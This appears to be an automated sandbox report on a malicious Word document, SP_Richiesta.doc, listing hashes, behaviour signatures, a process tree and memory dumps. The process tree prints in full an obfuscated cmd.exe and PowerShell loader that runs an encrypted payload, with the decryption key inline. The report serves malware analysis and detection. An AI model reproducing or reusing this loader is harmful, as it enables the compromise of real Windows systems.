Analysis

  • max time kernel
    111s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-04-2024 18:54

General

  • Target

    SP_Richiesta.doc

  • Size

    168KB

  • MD5

    073ea5db2eaf75947b6e9b67e438ef7b

  • SHA1

    15160e89985e0bea3bf3ce725c924fa16f47e15b

  • SHA256

    94c4eb4bf238b5fd68bad8b20829768bffed5e44eec1504c921fff8abe539756

  • SHA512

    0793427fdf97d9a08fa5b8f61d08f67286a77a0f4ce5b1ab03df80516ce88c1974cc7c1dbe16da2d5d8d8f6c45e75782bdd3f2eda77ca12a838bed376b0736d4

  • SSDEEP

    1536:mTNVczHkD9icmT+FFdZ+a9M9KfjJbkLDDQQQ0OXeBq3ni/yv4WY48+g/iXkIVVL5:mTn/iKFBr5Iwe43ntvTOakWLnepO

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SP_Richiesta.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" rhFXZhmvK RmVjRbXZszlijcamdjn lvLlVtdVjfQZil & %C^om^S^pEc% %C^om^S^pEc% /V /c set %EZmZEnibjGMZzfj%=ziJwsjlMVJAGr&&set %XRzNbKzkjXCilL%=p&&set %zpripnwkZCZkaw%=ow&&set %PQtilTRmLWujZMD%=GLVwzzR&&set %OzDuOPYR%=!%XRzNbKzkjXCilL%!&&set %LBGYnaEvmXjQqSu%=LSCmLPOTU&&set %LEHbEfzlw%=er&&set %QqLYaunoLaRf%=!%zpripnwkZCZkaw%!&&set %aPjAIMOMA%=s&&set %iMOziKsPzidiudM%=bHLpvNh&&set %fWthJZh%=he&&set %KBZYnMLwWK%=ll&&!%OzDuOPYR%!!%QqLYaunoLaRf%!!%LEHbEfzlw%!!%aPjAIMOMA%!!%fWthJZh%!!%KBZYnMLwWK%! "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAeABaAGIAMAB4AEkAWgBvAEEAPQA9AHwANwA1AGYANwA4ADAANABhADcAZgAwADgAOAA1ADAAMAA3AGMANQAzADAAMgBhAGIAYgAyAGMAZAAzADcAMABjAGIAOABmADIAYgAyAGMAMgBkADIAMwBmADIAMQA3AGUAYgAxADAANABlAGEAYgA3ADkAZgBhADcANQA3ADkAMAA4ADIAYQA3ADgAOQA1ADkANgA4AGUAYwA1ADIAZgBkADcAZgBlAGMANQA0AGEAZgA4ADUAMAA5ADcAYwBhAGEAYgA5ADAAYQA1ADQANwBlADIAYwBiADMANAA1ADcANwAyADMAZAA1AGUANwAyADQAOQAyADYAYQAyADUAMAA2ADgAOQA2AGQAYgAyAGQAZQAxAGEAZABiAGQAMwA0ADkAMwA5ADMAMAA5ADEAZABjAGUAMgBkAGMAMgA1AGEAOAAwAGIAOAAyADEANwA2ADgAYgA1AGQAZAA0AGQANgA2AGIAMQA2AGIANQA4ADIANABmADYAZAA1ADgAZgA4ADcAOQA1ADIAMgBkAGIAMgA3ADAAMgBlADUAYQA3ADIAMgBjADEAMwA0ADYAZgAyAGQAZQAyADAANABjAGEAZABkAGUANgBkADcANwBhADAAMQAzAGMAMAAyAGEAMgBmAGYAZABkAGIAMwAzADAANgAyAGMANQA2AGYAOAA4ADYAYwBiADkAOQA3ADUAOABjAGYANABiAGUANwBkAGUAMgA0ADUAOQBlAGEAYwAzADMAMwA0ADAAMgAwADUAMQAwAGUAYQA3ADEANQA0ADAAZQAwADYAYgBmAGQAMwBiADUAMQAyADUAZQA2AGUAMgBhADEAYQA5ADEAZQA2ADIAYwBjADAAMABlADUAYgBiAGIAMgBiADcAZABlAGIAMAAzADYAMAA4ADAAMgBmADcAMABkADIAZABkADUAOAA1ADcAOAA1AGQAMgBlADYANAA5ADMAOABjAGQAZQA0ADkAYQA3AGUAYgAyADEAMwA4AGEAZQAzADkAMQBhADQAYgA1ADAAYwA5AGIAMwBlAGMAMAAxAGUANABlADMAYwBlADQAOQAxAGIAYQBkAGEANAA1AGIAMABkAGQANAAzAGMAZgBkADcANQAyADgAZgAyAGYAYwA3ADYAMwA2ADUANgA5AGEAMgA2ADgANgA4ADIAYwAyAGUAMAAyAGQAZQBhADYAMgA3ADMAYgBjADIANgAyAGUAMABlAGUAYQBlAGUAZABjADYAMABiADEAMgA1AGEAMQA0AGUANQAwADQAYwA5ADQAMQBkADgAYwA3ADcAOABhAGUAMgA1AGUAMQA0ADcAYgAxADgAMQA2AGQAYwAzAGYAZgBiADIAYgAwAGQAYgBlADcANQBmADYAMQBkADIAOAA3ADEAZQA3ADIAMQBkADgAOAAwADkAYQA4AGEAOQAwADkAMAA3ADcANAA1ADUANgA5ADkANgAxAGUAYwA3AGUAZgBiADEANAAxADkANQA0AGEAZgA4ADQANAAwADUAMABmADYANwBkADkAZQAyAGQAZABkADQAZQBlADQAMABlADMAMwA4ADUAZgBlADEAZABmAGUAZAA3ADAAYgAyAGUAYQBiAGEAZABkADUAOQA2ADgAMQA3ADQANQBlAGUAYwA3ADkAYwA0ADEAYwA2ADAAMQBmADcAZAA5AGUANwAyADMAZgBlAGUAYgA0ADQAMwBmADUAZQA0ADcAZAA3ADIANwA1AGMAZQA2ADYAOAA4AGIANwBiADIAYwBkADIAZQBiADQAZQAxAGEAMAAzAGMAOAAwADcAYwBhADcANgA5ADkAOAA0ADMANQAwADgANQBhAGUAYgA5AGEAZQA5AGUAMQBiAGIAMQA3AGUAMQAwAGQAYwBiAGUAYQBjAGYAMQA4ADgAZAA0ADAAZgBjAGUAMQAyADYAMQA4AGQANwAyAGQANgA3ADcAMQA2AGIAMAAwADYAYgBhAGIAOAAxAGUAYQAxADQAMAA5ADkAMgAzADgAOAA5ADYAZgBjADUAMwBhADYAZAAyADgAMQA1ADcAMgA1ADUAMQAwAGQANwAyADYANABiAGUAMwA3AGMAYQAzADMAMABkAGYAYwAyAGYANAA0ADAAMAAxAGYAMgAyADQAZAA4AGEAMwBiAGEAZQBhADQAMwA2AGMAMgAwAGMAYQBhADcAMwAwADAAYQBiADAAMAAwAGEANgA3ADUAMgBkAGMAYwA5AGMANgAzAGUAOQBmADEANQA2ADQANwBiADYAMQA1AGYAOQBiAGIANwBhADMAMAAyADMAYgAxADIAZABmADIAOABmADYANAAxADgAMgAxADQAOAAwAGMAMQBjADIAOQBmADMANQA2AGEAZQBkADkAMgBiADMAMQBiAGUAZgBlADUANQBjADQANwA2AGIANwA5ADcAOAAxADIAZgAwADMAYQBhAGYANgBjAGMAYgA0ADgAYwA4ADMAMQA0ADkANgA3AGQAOABmADUANwAxADAANwAwAGMAMQA2AGMAMAA0ADEAMwBkADYAMwBlADYAYwAyADgAOAA0ADUAYwAzAGYAOABmADMANwA2AGEAMAA1AGMAMQAyADMAMAA4AGQANABmADIAOAA5AGMAOQAwADEAOQAyADcAOAA0ADMAOAAzAGIAOAAzADIAMgBjADgAMgBjADkAZAAxAGEAMQA0AGIAYgBjAGEANQBiADUAOABlADEANQBlADMAYgAzAGIANABlAGEANQBhAGEAZABiAGUAMgBmADUAZQBhADEANwBjADgAOQBjADQAYgA5ADYANgA5ADIAYgAzADAAYwA1ADYAOABiAGUAYQAyADkANQBmAGMAZAAzAGEAZAA5AGQAMAA3ADAAOQAwADAAMgBhADkAMgA2ADcAOQAxAGEANQBkADEAMwAzAGYAOQA5ADIANgBiAGYAYgBkAGQAYgA2ADgAZAAyADYANAAzAGUAZQA1ADIAMwBlADYAMQBjAGIAYgA4ADMAMwAyADMAZQBiADkAMgBmAGEAZABkAGMAMgA1ADgAMgAwADkAYQAzAGMAYQBlADgANAAzADgAYgA2AGEAMwBiADMANwA5ADYANwBjAGMAMwA0AGUAZQBiADcAMwA2ADcAOAA4ADAANwA1AGEAMwBlADQAZgA4AGUAOABlADUAZABkADQAZgA1ADAANgAzADUAMAA5ADEAZgBkADgAYQA3ADAANwBmAGUAMgBlADAAYwBhADgAYQA0ADgAMQA3ADkANQBkADAAMwAzADcANABiAGMAMwA4AGEAOQBhADIAZQA4ADIAYwAyAGYAYQA0ADcAZABiADUANQA2AGYAZQAxADMANwAzADMAMQBlADUAOAA1ADUANAA3ADMAMgBjAGQAZQBiADAAZAA4ADcAYgA0ADAAYgAxAGMAYQAyADIANgBkAGMANABmADcAMgA3ADkAZQAxADcAZgBhADEANAAzADMAYQA5ADIAMAAzADIAZgAyADgAZgAwADgAMABjADIANAAwADYAMgA2AGQAZgAxADkAMQA4AGUAMwAxAGUAMAA5AGEANwBlAGYAOABiADIAZABiADUAZQBjAGEAYQBiADIANAAyADIAMwA5AGUAYgA2AGEAYwBhAGYAMwA1ADQAOAA1ADUAYgBkAGQAMAAxADYAYgBjADYAMQA3AGYAZAA3ADUAYQAyAGUANAA3AGQAYwBiAGUAMgBmADcAZgBjADUAMQA4ADkAZgBmAGYAOAA0ADAAZAA4AGIAYwA2ADcAZgAxADYANgBkADIAZQAwADYAMwBiADUAMQBlADUAZgBhADMANQAyAGYAMwBjADEANQBhAGUAOABkAGEANwA0ADIANABjADAANwAyAGMAYQA4ADEAYgA0AGUAYwA3AGUAMgA0ADAAYwAwADIAOQA5ADUAOABiAGMANwA0ADcAMAAwADYAMAA3AGEAYgAwADkAOABiADgAMwA2ADIAYwA2ADkAMAA1AGQAMQBjAGMAMwA3ADYANAA5ADkAYgA5ADUAOQAwAGUAZgBjADAAZABmADEAMgBmADQAMgA5ADIAYwBiADEAZgAyADcAOAAxADAANAAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIANAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,244,26,241,36,138,128,131)) ) ) )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:4976
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell "iex(( [rUnTimE.InTErOpSerVIceS.marShal]::([RUnTIMe.IntEROpservICeS.maRsHAl].geTmEmbERS()[1].nAME).iNVOKe([RuNtIME.intEROpSerViCeS.mARShAL]::sECuResTriNgtOglOBalALLoCANSi($('76492d1116743f0423413b16050a5345MgB8AFEAVwBVAG4AbgBiAEwAcQBjACsAbgBpAGwAeABaAGIAMAB4AEkAWgBvAEEAPQA9AHwANwA1AGYANwA4ADAANABhADcAZgAwADgAOAA1ADAAMAA3AGMANQAzADAAMgBhAGIAYgAyAGMAZAAzADcAMABjAGIAOABmADIAYgAyAGMAMgBkADIAMwBmADIAMQA3AGUAYgAxADAANABlAGEAYgA3ADkAZgBhADcANQA3ADkAMAA4ADIAYQA3ADgAOQA1ADkANgA4AGUAYwA1ADIAZgBkADcAZgBlAGMANQA0AGEAZgA4ADUAMAA5ADcAYwBhAGEAYgA5ADAAYQA1ADQANwBlADIAYwBiADMANAA1ADcANwAyADMAZAA1AGUANwAyADQAOQAyADYAYQAyADUAMAA2ADgAOQA2AGQAYgAyAGQAZQAxAGEAZABiAGQAMwA0ADkAMwA5ADMAMAA5ADEAZABjAGUAMgBkAGMAMgA1AGEAOAAwAGIAOAAyADEANwA2ADgAYgA1AGQAZAA0AGQANgA2AGIAMQA2AGIANQA4ADIANABmADYAZAA1ADgAZgA4ADcAOQA1ADIAMgBkAGIAMgA3ADAAMgBlADUAYQA3ADIAMgBjADEAMwA0ADYAZgAyAGQAZQAyADAANABjAGEAZABkAGUANgBkADcANwBhADAAMQAzAGMAMAAyAGEAMgBmAGYAZABkAGIAMwAzADAANgAyAGMANQA2AGYAOAA4ADYAYwBiADkAOQA3ADUAOABjAGYANABiAGUANwBkAGUAMgA0ADUAOQBlAGEAYwAzADMAMwA0ADAAMgAwADUAMQAwAGUAYQA3ADEANQA0ADAAZQAwADYAYgBmAGQAMwBiADUAMQAyADUAZQA2AGUAMgBhADEAYQA5ADEAZQA2ADIAYwBjADAAMABlADUAYgBiAGIAMgBiADcAZABlAGIAMAAzADYAMAA4ADAAMgBmADcAMABkADIAZABkADUAOAA1ADcAOAA1AGQAMgBlADYANAA5ADMAOABjAGQAZQA0ADkAYQA3AGUAYgAyADEAMwA4AGEAZQAzADkAMQBhADQAYgA1ADAAYwA5AGIAMwBlAGMAMAAxAGUANABlADMAYwBlADQAOQAxAGIAYQBkAGEANAA1AGIAMABkAGQANAAzAGMAZgBkADcANQAyADgAZgAyAGYAYwA3ADYAMwA2ADUANgA5AGEAMgA2ADgANgA4ADIAYwAyAGUAMAAyAGQAZQBhADYAMgA3ADMAYgBjADIANgAyAGUAMABlAGUAYQBlAGUAZABjADYAMABiADEAMgA1AGEAMQA0AGUANQAwADQAYwA5ADQAMQBkADgAYwA3ADcAOABhAGUAMgA1AGUAMQA0ADcAYgAxADgAMQA2AGQAYwAzAGYAZgBiADIAYgAwAGQAYgBlADcANQBmADYAMQBkADIAOAA3ADEAZQA3ADIAMQBkADgAOAAwADkAYQA4AGEAOQAwADkAMAA3ADcANAA1ADUANgA5ADkANgAxAGUAYwA3AGUAZgBiADEANAAxADkANQA0AGEAZgA4ADQANAAwADUAMABmADYANwBkADkAZQAyAGQAZABkADQAZQBlADQAMABlADMAMwA4ADUAZgBlADEAZABmAGUAZAA3ADAAYgAyAGUAYQBiAGEAZABkADUAOQA2ADgAMQA3ADQANQBlAGUAYwA3ADkAYwA0ADEAYwA2ADAAMQBmADcAZAA5AGUANwAyADMAZgBlAGUAYgA0ADQAMwBmADUAZQA0ADcAZAA3ADIANwA1AGMAZQA2ADYAOAA4AGIANwBiADIAYwBkADIAZQBiADQAZQAxAGEAMAAzAGMAOAAwADcAYwBhADcANgA5ADkAOAA0ADMANQAwADgANQBhAGUAYgA5AGEAZQA5AGUAMQBiAGIAMQA3AGUAMQAwAGQAYwBiAGUAYQBjAGYAMQA4ADgAZAA0ADAAZgBjAGUAMQAyADYAMQA4AGQANwAyAGQANgA3ADcAMQA2AGIAMAAwADYAYgBhAGIAOAAxAGUAYQAxADQAMAA5ADkAMgAzADgAOAA5ADYAZgBjADUAMwBhADYAZAAyADgAMQA1ADcAMgA1ADUAMQAwAGQANwAyADYANABiAGUAMwA3AGMAYQAzADMAMABkAGYAYwAyAGYANAA0ADAAMAAxAGYAMgAyADQAZAA4AGEAMwBiAGEAZQBhADQAMwA2AGMAMgAwAGMAYQBhADcAMwAwADAAYQBiADAAMAAwAGEANgA3ADUAMgBkAGMAYwA5AGMANgAzAGUAOQBmADEANQA2ADQANwBiADYAMQA1AGYAOQBiAGIANwBhADMAMAAyADMAYgAxADIAZABmADIAOABmADYANAAxADgAMgAxADQAOAAwAGMAMQBjADIAOQBmADMANQA2AGEAZQBkADkAMgBiADMAMQBiAGUAZgBlADUANQBjADQANwA2AGIANwA5ADcAOAAxADIAZgAwADMAYQBhAGYANgBjAGMAYgA0ADgAYwA4ADMAMQA0ADkANgA3AGQAOABmADUANwAxADAANwAwAGMAMQA2AGMAMAA0ADEAMwBkADYAMwBlADYAYwAyADgAOAA0ADUAYwAzAGYAOABmADMANwA2AGEAMAA1AGMAMQAyADMAMAA4AGQANABmADIAOAA5AGMAOQAwADEAOQAyADcAOAA0ADMAOAAzAGIAOAAzADIAMgBjADgAMgBjADkAZAAxAGEAMQA0AGIAYgBjAGEANQBiADUAOABlADEANQBlADMAYgAzAGIANABlAGEANQBhAGEAZABiAGUAMgBmADUAZQBhADEANwBjADgAOQBjADQAYgA5ADYANgA5ADIAYgAzADAAYwA1ADYAOABiAGUAYQAyADkANQBmAGMAZAAzAGEAZAA5AGQAMAA3ADAAOQAwADAAMgBhADkAMgA2ADcAOQAxAGEANQBkADEAMwAzAGYAOQA5ADIANgBiAGYAYgBkAGQAYgA2ADgAZAAyADYANAAzAGUAZQA1ADIAMwBlADYAMQBjAGIAYgA4ADMAMwAyADMAZQBiADkAMgBmAGEAZABkAGMAMgA1ADgAMgAwADkAYQAzAGMAYQBlADgANAAzADgAYgA2AGEAMwBiADMANwA5ADYANwBjAGMAMwA0AGUAZQBiADcAMwA2ADcAOAA4ADAANwA1AGEAMwBlADQAZgA4AGUAOABlADUAZABkADQAZgA1ADAANgAzADUAMAA5ADEAZgBkADgAYQA3ADAANwBmAGUAMgBlADAAYwBhADgAYQA0ADgAMQA3ADkANQBkADAAMwAzADcANABiAGMAMwA4AGEAOQBhADIAZQA4ADIAYwAyAGYAYQA0ADcAZABiADUANQA2AGYAZQAxADMANwAzADMAMQBlADUAOAA1ADUANAA3ADMAMgBjAGQAZQBiADAAZAA4ADcAYgA0ADAAYgAxAGMAYQAyADIANgBkAGMANABmADcAMgA3ADkAZQAxADcAZgBhADEANAAzADMAYQA5ADIAMAAzADIAZgAyADgAZgAwADgAMABjADIANAAwADYAMgA2AGQAZgAxADkAMQA4AGUAMwAxAGUAMAA5AGEANwBlAGYAOABiADIAZABiADUAZQBjAGEAYQBiADIANAAyADIAMwA5AGUAYgA2AGEAYwBhAGYAMwA1ADQAOAA1ADUAYgBkAGQAMAAxADYAYgBjADYAMQA3AGYAZAA3ADUAYQAyAGUANAA3AGQAYwBiAGUAMgBmADcAZgBjADUAMQA4ADkAZgBmAGYAOAA0ADAAZAA4AGIAYwA2ADcAZgAxADYANgBkADIAZQAwADYAMwBiADUAMQBlADUAZgBhADMANQAyAGYAMwBjADEANQBhAGUAOABkAGEANwA0ADIANABjADAANwAyAGMAYQA4ADEAYgA0AGUAYwA3AGUAMgA0ADAAYwAwADIAOQA5ADUAOABiAGMANwA0ADcAMAAwADYAMAA3AGEAYgAwADkAOABiADgAMwA2ADIAYwA2ADkAMAA1AGQAMQBjAGMAMwA3ADYANAA5ADkAYgA5ADUAOQAwAGUAZgBjADAAZABmADEAMgBmADQAMgA5ADIAYwBiADEAZgAyADcAOAAxADAANAAyAGMANAA3ADUAYwBhADEANgBkADMANABlADIAOQBmADcAOQA4AGUAMAA1ADIANAA1ADUAYgAwADIAZABjAGMAYQAxAA=='| CoNvErTTO-SeCUrEstRIng -kEY 3,211,236,164,37,68,140,210,255,95,208,148,140,46,48,73,228,255,71,236,131,41,146,87,71,244,26,241,36,138,128,131)) ) ) )
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1660

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwhidfu5.bvw.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1660-37-0x0000016FC1F60000-0x0000016FC1F82000-memory.dmp

    Filesize

    136KB

  • memory/2176-28-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-5-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-1-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-29-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-7-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-30-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-9-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-11-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-8-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-6-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-12-0x00007FFCE6A00000-0x00007FFCE6A10000-memory.dmp

    Filesize

    64KB

  • memory/2176-13-0x00007FFCE6A00000-0x00007FFCE6A10000-memory.dmp

    Filesize

    64KB

  • memory/2176-24-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-25-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-26-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-27-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-79-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-3-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-10-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-36-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-4-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-2-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-51-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB

  • memory/2176-52-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-53-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-54-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-55-0x0000015583920000-0x0000015584120000-memory.dmp

    Filesize

    8.0MB

  • memory/2176-56-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-57-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-58-0x00000155879E0000-0x00000155889B0000-memory.dmp

    Filesize

    15.8MB

  • memory/2176-77-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-78-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-76-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-0-0x00007FFCE8CD0000-0x00007FFCE8CE0000-memory.dmp

    Filesize

    64KB

  • memory/2176-80-0x00007FFD28C50000-0x00007FFD28E45000-memory.dmp

    Filesize

    2.0MB